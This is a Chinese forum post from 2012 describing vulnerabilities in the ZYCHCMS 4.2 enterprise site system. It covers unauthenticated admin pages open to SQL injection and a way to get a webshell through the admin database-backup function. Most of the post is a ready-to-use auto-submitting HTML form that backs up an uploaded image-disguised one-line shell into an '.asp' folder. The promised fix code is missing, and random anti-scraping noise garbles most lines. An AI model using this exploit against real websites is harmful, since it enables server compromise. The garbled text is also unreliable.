% w9 p7 o! V* X; `" W" U0 B% r" ?! w5 W' ~9 J/ m
/ q- ]2 r [; F* p9 D& I5 |
2 F4 }: B' q+ C! e- A影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
9 d. d8 c* y* M2 t: x n( j ①SQL注射漏洞
`6 x) r" B; p5 I; J! s I 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp3 }, y- W7 i, P" o* U: f
漏洞原因:未过滤
9 `+ [# V: A! S9 y' \0 m8 p 漏洞代码:
/ n9 B/ H% k: e# F8 k; ~9 _ 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
# `; H7 e7 D8 E$ i5 S0 u. A 修复方法:在文件开头加入代码
# H* w6 z. W& a+ [0 o5 \3 O : N% Q. y2 B" y8 G1 Y5 g2 P; {( n0 Y2 Y. T
A7 U( ?; i* @1 \' C S
②后台拿WBSHELL
% Y5 O+ n' z( K) D8 e) Z 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
3 i4 H# n3 T5 J 这里在网上找了一个,改了下,将就着用。# k* r5 M5 y+ W( N* |; I3 f
以下是代码本地提交代码
) r" f% {% Q/ q ^4 d1 d* W1 h2 u* x
, u5 y- X c% S) ]" p6 E" @4 e( ~8 z+ d- Y. k& G
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>" x& U7 z2 \, b
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
" _1 w# s1 {1 D <tr>
% g; \: D$ {: ?& B: K: d4 F <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
) `" M" l2 ^+ O) i& G$ E4 u: B </tr>
; u$ T2 n- g" o i0 ? S3 B) D7 `' H <tr>: |3 q# D" T! c+ `: Z0 m; u3 `; _
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
! t/ X' e! ]' R" p) w% I( B1 O </span>
3 p# _% U8 ~/ Y6 Z1 D9 M a <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >; l0 F' t' B9 G, o( r$ E% w, Z
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >2 a& g! ?. w- F
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>$ S0 W4 t3 e/ T4 p
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d: |0 b- C9 j. W6 D
<div align=”left”>
+ H8 }4 L6 n$ B+ L <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
, ?& W) L; a; ^" w+ r$ l <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
: x1 E: m2 s: J3 E <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />" z2 f- N4 N# f8 s( H
</div></td>4 ]" q5 R c+ Q
</tr>7 c4 a7 Y' U$ R B3 a
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>% b5 M6 B6 M5 q' {
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
, C9 O' X! ]3 k- G <td class=”td”><div align=”left”>
& v& r- o$ Z( y/ p <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
( {2 M- {9 k5 F$ ~/ K4 d& o [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>& Q, ]8 }+ b# p. X* F) K1 ?7 q
</tr>: _: s7 a# O* |+ D$ {, N( T7 l$ J
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
3 B* Z7 N1 ]" E, j# \ <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
2 p4 I) e/ z" L" p <td class=”td”><div align=”left”>% e: E6 V. a7 J5 i- P+ e; h
<input type=”submit” value=”确定备份” class=”btn”# w% Z! @/ l6 R- \5 Q- f% K" _
</div></td>3 d$ H. l3 i# l) Z( {, s8 o
</tr>/ L( ~2 [1 ?& @+ a
</table></td></tr></form>
7 F3 [% K/ m( I. V </table>
; R7 C$ G" D2 d3 @) f5 A </td>7 L7 X3 w+ F }: ~5 C& ]" v7 Y) c
</tr>7 Z* [, M# }- j) `2 ~
</table>
0 l1 ?+ o% l! \! K; [' Q; m! D7 L <script>" Y5 k! K6 f, k; W
document.all.add.submit();) w `9 m; |2 t8 \& k0 s+ `+ |
</script>
# H* X& g, f& G: B5 Q4 J5 r. @6 n
. H$ g: `- o) ~ G; H# {
2 \1 i9 n& W& [( T: {$ P3 `8 U0 s6 M+ M2 q V6 J# [! ]) s' M
1 S, N- u3 V. k) j T6 G. u2 D: J- Y3 J$ _2 D5 l' I
+ |2 D2 L7 {9 U2 ^# @# O* ]
% ?- i6 h; E0 N, n# ]2 _% T# y* U* Z4 h
. ^+ }5 X% ~; \- H
* c; y1 P9 \- T- `: x: I
|
发表于 2012-9-10 21:09:51
收藏
支持
反对